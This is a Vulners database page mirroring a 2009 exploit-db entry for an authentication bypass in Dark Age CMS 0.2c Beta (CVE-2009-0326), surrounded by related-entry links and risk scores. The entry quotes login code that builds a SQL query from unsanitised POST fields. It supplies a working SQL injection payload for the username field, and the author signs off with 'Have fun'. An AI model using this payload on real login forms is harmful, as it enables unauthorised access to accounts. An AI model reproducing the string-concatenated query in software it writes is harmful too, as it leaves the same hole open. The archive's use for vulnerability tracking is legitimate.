Lucene search
+L

Dark Age CMS 0.2c Beta - Authentication Bypass

🗓️ 13 Jan 2009 00:00:00Reported by darkjokerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

Dark Age CMS 0.2c Beta is vulnerable to authentication bypass via SQL injection attack.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-0326
13 Jan 200900:00
circl
CVE
CVE-2009-0326
29 Jan 200918:09
cve
Cvelist
CVE-2009-0326
29 Jan 200918:09
cvelist
Exploit DB
Dark Age CMS 2.0 - 'login.php' SQL Injection
14 Jan 200900:00
exploitdb
EUVD
EUVD-2009-0330
7 Oct 202500:30
euvd
NVD
CVE-2009-0326
29 Jan 200918:30
nvd
Prion
Sql injection
29 Jan 200918:30
prion
--+++==================================================================================+++--
--+++====== Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability ======+++--
--+++==================================================================================+++--

[+] Dark Age CMS <= v0.2c Beta (Auth Bypass) SQL Injection Vulnerability
[+] Author: darkjoker
[+] Site  : http://darkjoker.net23.net
[+] Notes : Have fun

[+] Code
[+]	$username = $_POST['username'];
[+]	$user_password = $_POST['password'];
[+]	$password = md5($user_password);
[+]
[+]	$query = "SELECT * FROM " . ACCOUNTS_TABLE . " WHERE username='$username' AND password = '$password'";
[+]	$result = mysql_query($query) or die('error making query');
[+]

[+] Login data:

[+] Username: x' OR 'x' = 'x'#
[+] Password: anything

# milw0rm.com [2009-01-13]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Jan 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.00915
29